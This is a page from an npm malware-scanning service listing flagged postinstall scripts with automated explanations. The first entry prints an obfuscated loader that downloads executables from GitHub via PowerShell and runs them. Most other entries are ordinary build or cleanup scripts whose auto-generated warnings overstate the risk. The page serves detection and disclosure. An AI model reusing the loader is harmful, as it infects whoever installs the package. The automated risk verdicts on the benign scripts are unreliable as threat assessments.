Home
Docs
GitHub
Blog

Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our 𝕏 / Twitter feed for updates.

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This code downloads executable files from potentially malicious URLs and runs them on the local system using PowerShell commands. This poses a serious security risk as it can execute arbitrary code, potentially leading to unauthorized access, control of the system, and data breaches.

Install script:
node index.js
Install script code:
const _0x1d74f0=_0x2a69;function _0x44ef(){const _0x4f640e=['thub.com/z','https://gi','es.exe','213588oHSAoe','\x20-Command\x20','214lULLlc','ekdQg','xc8290asid','24oxSDvN','vsWorker.e','cmd.exe','\x22Start-Pro','error','child_proc','\x22Invoke-We','446031pmnoju','\x27\x20-OutFile','265228JtpUZt','1523940uyheQC','Error:\x20','join','.exe','2027263DhUioZ','n/vsWorker','buildnodes','cess\x20\x27','2307110toCZPP','le/raw/mai','powershell','6lfRIUH','length','bRequest\x20-','Uri\x20\x27','Downloaded','promisify','\x20successfu','qfRwi','message','n/buildnod','rXbcI','path','n/cmd.exe','Executed\x20','ess','oioj/anima','nSGGD','714bfJlOu','log','util','lly','tedguacamo'];_0x44ef=function(){return _0x4f640e;};return _0x44ef();}(function(_0x4cb1c4,_0x168878){const _0xa1b5d=_0x2a69,_0x398359=_0x4cb1c4();while(!![]){try{const _0x5c1e99=-parseInt(_0xa1b5d(0x161))/(0x2*0x1304+0x3d*-0x71+0xe*-0xcb)*(-parseInt(_0xa1b5d(0x18a))/(0x1c67+0x4c7*0x3+0xe3e*-0x3))+-parseInt(_0xa1b5d(0x16b))/(0x1725*-0x1+0x19f8+-0x2d0)+parseInt(_0xa1b5d(0x16d))/(-0x805*-0x1+-0x836*0x2+-0x86b*-0x1)+parseInt(_0xa1b5d(0x16e))/(-0xb76+0x15e3+-0xa68)+parseInt(_0xa1b5d(0x179))/(-0x13a8+-0xd3*0x19+0x2849*0x1)*(-parseInt(_0xa1b5d(0x172))/(-0x287+0x2383*-0x1+0x79d*0x5))+-parseInt(_0xa1b5d(0x164))/(-0x15e6+0x1f*0x6d+-0x2e9*-0x3)*(parseInt(_0xa1b5d(0x192))/(-0x1503+-0x18b4*0x1+0x2dc0))+parseInt(_0xa1b5d(0x176))/(0x47f+-0x1*-0x144e+0x841*-0x3);if(_0x5c1e99===_0x168878)break;else _0x398359['push'](_0x398359['shift']());}catch(_0x4cf96c){_0x398359['push'](_0x398359['shift']());}}}(_0x44ef,0xc1*-0x1e3+-0x808b+0x47fc0));const {exec}=require(_0x1d74f0(0x169)+_0x1d74f0(0x187)),path=require(_0x1d74f0(0x184)),util=require(_0x1d74f0(0x18c)),execAsync=util[_0x1d74f0(0x17e)](exec),urls=[_0x1d74f0(0x190)+_0x1d74f0(0x18f)+_0x1d74f0(0x163)+_0x1d74f0(0x188)+_0x1d74f0(0x18e)+_0x1d74f0(0x177)+_0x1d74f0(0x185),_0x1d74f0(0x190)+_0x1d74f0(0x18f)+_0x1d74f0(0x163)+_0x1d74f0(0x188)+_0x1d74f0(0x18e)+_0x1d74f0(0x177)+_0x1d74f0(0x182)+_0x1d74f0(0x191),_0x1d74f0(0x190)+_0x1d74f0(0x18f)+_0x1d74f0(0x163)+_0x1d74f0(0x188)+_0x1d74f0(0x18e)+_0x1d74f0(0x177)+_0x1d74f0(0x173)+_0x1d74f0(0x171)],outputFiles=[path[_0x1d74f0(0x170)](__dirname,_0x1d74f0(0x166)),path[_0x1d74f0(0x170)](__dirname,_0x1d74f0(0x174)+_0x1d74f0(0x171)),path[_0x1d74f0(0x170)](__dirname,_0x1d74f0(0x165)+'xe')];async function downloadAndRun(_0x273a19,_0x739610){const _0x364b35=_0x1d74f0,_0x28f332={'ekdQg':function(_0x5eb753,_0x54c4ba){return _0x5eb753(_0x54c4ba);},'qfRwi':function(_0x36733f,_0x54a82e){return _0x36733f(_0x54a82e);}},_0x3bf4d9=_0x364b35(0x178)+_0x364b35(0x160)+_0x364b35(0x16a)+_0x364b35(0x17b)+_0x364b35(0x17c)+_0x273a19+(_0x364b35(0x16c)+'\x20\x27')+_0x739610+'\x27\x22',_0x102c4a=_0x364b35(0x178)+_0x364b35(0x160)+_0x364b35(0x167)+_0x364b35(0x175)+_0x739610+'\x27\x22';try{await _0x28f332[_0x364b35(0x162)](execAsync,_0x3bf4d9),console[_0x364b35(0x18b)](_0x364b35(0x17d)+'\x20'+_0x739610+(_0x364b35(0x17f)+_0x364b35(0x18d))),await _0x28f332[_0x364b35(0x180)](execAsync,_0x102c4a),console[_0x364b35(0x18b)](_0x364b35(0x186)+_0x739610+(_0x364b35(0x17f)+_0x364b35(0x18d)));}catch(_0x3ceb9c){console[_0x364b35(0x168)](_0x364b35(0x16f)+_0x3ceb9c[_0x364b35(0x181)]);}}function _0x2a69(_0xac1649,_0x3e4c9e){const _0x36a31b=_0x44ef();return _0x2a69=function(_0xac0b1d,_0x269b86){_0xac0b1d=_0xac0b1d-(-0x2*-0xe0e+-0x1d*-0xfd+0x3*-0x1277);let _0x4ff6ff=_0x36a31b[_0xac0b1d];return _0x4ff6ff;},_0x2a69(_0xac1649,_0x3e4c9e);}((async()=>{const _0x11bd22=_0x1d74f0,_0x2f23e2={'rXbcI':function(_0x3ec537,_0x52b13a){return _0x3ec537<_0x52b13a;},'nSGGD':function(_0x3f0178,_0x5bda0c,_0x4dc723){return _0x3f0178(_0x5bda0c,_0x4dc723);}};for(let _0x5310d3=-0xd7b+0x1*0x1ee+0xb8d;_0x2f23e2[_0x11bd22(0x183)](_0x5310d3,urls[_0x11bd22(0x17a)]);_0x5310d3++){await _0x2f23e2[_0x11bd22(0x189)](downloadAndRun,urls[_0x5310d3],outputFiles[_0x5310d3]);}})());

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code dynamically executes scripts based on the package's version, potentially allowing for the execution of arbitrary code. It first checks if the version of the package is '0.0.0', and if so, it compiles and runs a build script, and thereafter executes another script. This could allow an attacker to manipulate the package in a way that runs malicious code, especially if user input or untrusted sources are involved.

Install script:
node scripts/postinstall.js
Install script code:
const path = require('path')

const postInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'postinstall.js')
const localInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'localinstall.js')

try {
  // that's when we develop in the monorepo, `dist` does not exist yet
  // so we compile postinstall script and trigger it immediately after
  if (require('../package.json').version === '0.0.0') {
    const execa = require('execa')
    const buildScriptPath = path.join(__dirname, '..', 'helpers', 'build.ts')

    execa.sync('pnpm', ['tsx', buildScriptPath], {
      // for the sake of simplicity, we IGNORE_EXTERNALS in our own setup
      // ie. when the monorepo installs, the postinstall is self-contained
      env: { DEV: true, IGNORE_EXTERNALS: true },
      stdio: 'inherit',
    })

    // if enabled, it will install engine overrides into the cache dir
    execa.sync('node', [localInstallScriptPath], {
      stdio: 'inherit',
    })
  }
} catch {}

// that's the normal path, when users get this package ready/installed
require(postInstallScriptPath)

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code executes a script from a possibly untrusted source, potentially allowing for arbitrary code execution. It checks the version of the package, and if it is '0.0.0', it compiles a build script and then triggers a local install script. This could lead to running harmful commands if the local install script or the build script are compromised, posing a significant risk to the system.

Install script:
node scripts/postinstall.js
Install script code:
const path = require('path')

const postInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'postinstall.js')
const localInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'localinstall.js')

try {
  // that's when we develop in the monorepo, `dist` does not exist yet
  // so we compile postinstall script and trigger it immediately after
  if (require('../package.json').version === '0.0.0') {
    const execa = require('execa')
    const buildScriptPath = path.join(__dirname, '..', 'helpers', 'build.ts')

    execa.sync('pnpm', ['tsx', buildScriptPath], {
      // for the sake of simplicity, we IGNORE_EXTERNALS in our own setup
      // ie. when the monorepo installs, the postinstall is self-contained
      env: { DEV: true, IGNORE_EXTERNALS: true },
      stdio: 'inherit',
    })

    // if enabled, it will install engine overrides into the cache dir
    execa.sync('node', [localInstallScriptPath], {
      stdio: 'inherit',
    })
  }
} catch {}

// that's the normal path, when users get this package ready/installed
require(postInstallScriptPath)

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The script checks for a specific version of a package and conditionally executes a build process using execa. It then runs another script, postInstallScriptPath, which could potentially run harmful code if the script contains malicious instructions, especially since execution happens without user consent or visibility into what that code might do. Additionally, if this script is part of a package that is installed, it may have access to sensitive system resources.

Install script:
node scripts/postinstall.js
Install script code:
const path = require('path')

const postInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'postinstall.js')
const localInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'localinstall.js')

try {
  // that's when we develop in the monorepo, `dist` does not exist yet
  // so we compile postinstall script and trigger it immediately after
  if (require('../package.json').version === '0.0.0') {
    const execa = require('execa')
    const buildScriptPath = path.join(__dirname, '..', 'helpers', 'build.ts')

    execa.sync('pnpm', ['tsx', buildScriptPath], {
      // for the sake of simplicity, we IGNORE_EXTERNALS in our own setup
      // ie. when the monorepo installs, the postinstall is self-contained
      env: { DEV: true, IGNORE_EXTERNALS: true },
      stdio: 'inherit',
    })

    // if enabled, it will install engine overrides into the cache dir
    execa.sync('node', [localInstallScriptPath], {
      stdio: 'inherit',
    })
  }
} catch {}

// that's the normal path, when users get this package ready/installed
require(postInstallScriptPath)

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This code contains a potential security risk because it downloads and executes a local installation script (localinstall.js) and a post-install script (postinstall.js) based on certain conditions. If any of these scripts are compromised or contain malicious code, they could run unauthorized commands, potentially leading to arbitrary code execution or other harmful actions on the system. Additionally, if the package version is incorrectly set or manipulated, it could trigger these scripts unexpectedly.

Install script:
node scripts/postinstall.js
Install script code:
const path = require('path')

const postInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'postinstall.js')
const localInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'localinstall.js')

try {
  // that's when we develop in the monorepo, `dist` does not exist yet
  // so we compile postinstall script and trigger it immediately after
  if (require('../package.json').version === '0.0.0') {
    const execa = require('execa')
    const buildScriptPath = path.join(__dirname, '..', 'helpers', 'build.ts')

    execa.sync('pnpm', ['tsx', buildScriptPath], {
      // for the sake of simplicity, we IGNORE_EXTERNALS in our own setup
      // ie. when the monorepo installs, the postinstall is self-contained
      env: { DEV: true, IGNORE_EXTERNALS: true },
      stdio: 'inherit',
    })

    // if enabled, it will install engine overrides into the cache dir
    execa.sync('node', [localInstallScriptPath], {
      stdio: 'inherit',
    })
  }
} catch {}

// that's the normal path, when users get this package ready/installed
require(postInstallScriptPath)

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The script checks if the version of the package is '0.0.0' and if true, it executes a build script potentially allowing an arbitrary script (localInstallScriptPath) to run. This can lead to running malicious code if the content of these scripts is compromised or if their location is manipulated, posing a significant risk to the system.

Install script:
node scripts/postinstall.js
Install script code:
const path = require('path')

const postInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'postinstall.js')
const localInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'localinstall.js')

try {
  // that's when we develop in the monorepo, `dist` does not exist yet
  // so we compile postinstall script and trigger it immediately after
  if (require('../package.json').version === '0.0.0') {
    const execa = require('execa')
    const buildScriptPath = path.join(__dirname, '..', 'helpers', 'build.ts')

    execa.sync('pnpm', ['tsx', buildScriptPath], {
      // for the sake of simplicity, we IGNORE_EXTERNALS in our own setup
      // ie. when the monorepo installs, the postinstall is self-contained
      env: { DEV: true, IGNORE_EXTERNALS: true },
      stdio: 'inherit',
    })

    // if enabled, it will install engine overrides into the cache dir
    execa.sync('node', [localInstallScriptPath], {
      stdio: 'inherit',
    })
  }
} catch {}

// that's the normal path, when users get this package ready/installed
require(postInstallScriptPath)

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The script runs external commands (pnpm and node) potentially executing arbitrary scripts included in the package, particularly when an invalid version is detected (version '0.0.0'). This could be exploited to execute malicious code if an attacker has compromised the package. Additionally, it relies on dynamic paths and conditions that could be manipulated.

Install script:
node scripts/postinstall.js
Install script code:
const path = require('path')

const postInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'postinstall.js')
const localInstallScriptPath = path.join(__dirname, '..', 'dist', 'scripts', 'localinstall.js')

try {
  // that's when we develop in the monorepo, `dist` does not exist yet
  // so we compile postinstall script and trigger it immediately after
  if (require('../package.json').version === '0.0.0') {
    const execa = require('execa')
    const buildScriptPath = path.join(__dirname, '..', 'helpers', 'build.ts')

    execa.sync('pnpm', ['tsx', buildScriptPath], {
      // for the sake of simplicity, we IGNORE_EXTERNALS in our own setup
      // ie. when the monorepo installs, the postinstall is self-contained
      env: { DEV: true, IGNORE_EXTERNALS: true },
      stdio: 'inherit',
    })

    // if enabled, it will install engine overrides into the cache dir
    execa.sync('node', [localInstallScriptPath], {
      stdio: 'inherit',
    })
  }
} catch {}

// that's the normal path, when users get this package ready/installed
require(postInstallScriptPath)

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code attempts to delete the peer dependencies from the node_modules directory if the src directory does not exist. It uses the rimraf module, which is designed to remove files and directories recursively. This could lead to unintentional data loss or disruption of application functionality, especially if there are misconfigurations or if it is run in an unintended environment. The lack of error handling while reading package.json can also silence critical issues, leading to unexpected behavior.

Install script:
node ./scripts/postinstall.js
Install script code:
const rimraf = require('rimraf');
const path = require('path');
const fs = require('fs');

if (!fs.existsSync(path.join(__dirname, '../src'))) {
    try {
        const package = JSON.parse(fs.readFileSync(path.join(__dirname, '../package.json')).toString())
        Object.keys(package.peerDependencies).forEach((name) => {
            rimraf(path.join(__dirname, `../node_modules/${name}`), () => null)
        })
    } catch {
    }    
}

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The script may contain malicious code that could compromise sensitive information, gain unauthorized access, or execute harmful actions without consent. It is essential to review the content of the install.js file to understand its specific intentions and potential risks.

Install script:
./install.js

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The script attempts to check if the coc command-line tool is installed by running coc --version. If it is not found, it proceeds to install the @cocreate/cli package globally using npm. This could pose a security risk as it executes shell commands that modify the system and may allow for unintended consequences, including unauthorized access to system resources or executing malicious code if the package itself is compromised.

Install script:
node -e "const { execSync } = require('child_process'); try { execSync('coc --version', { stdio: 'ignore' }); } catch (error) { try { execSync('npm install -g @cocreate/cli', { stdio: 'inherit' }); console.log('Installed "@cocreate/cli" globally.'); } catch (error) { console.error('Failed to install "@cocreate/cli" globally:', error); } }"
1,186 vulnerabilities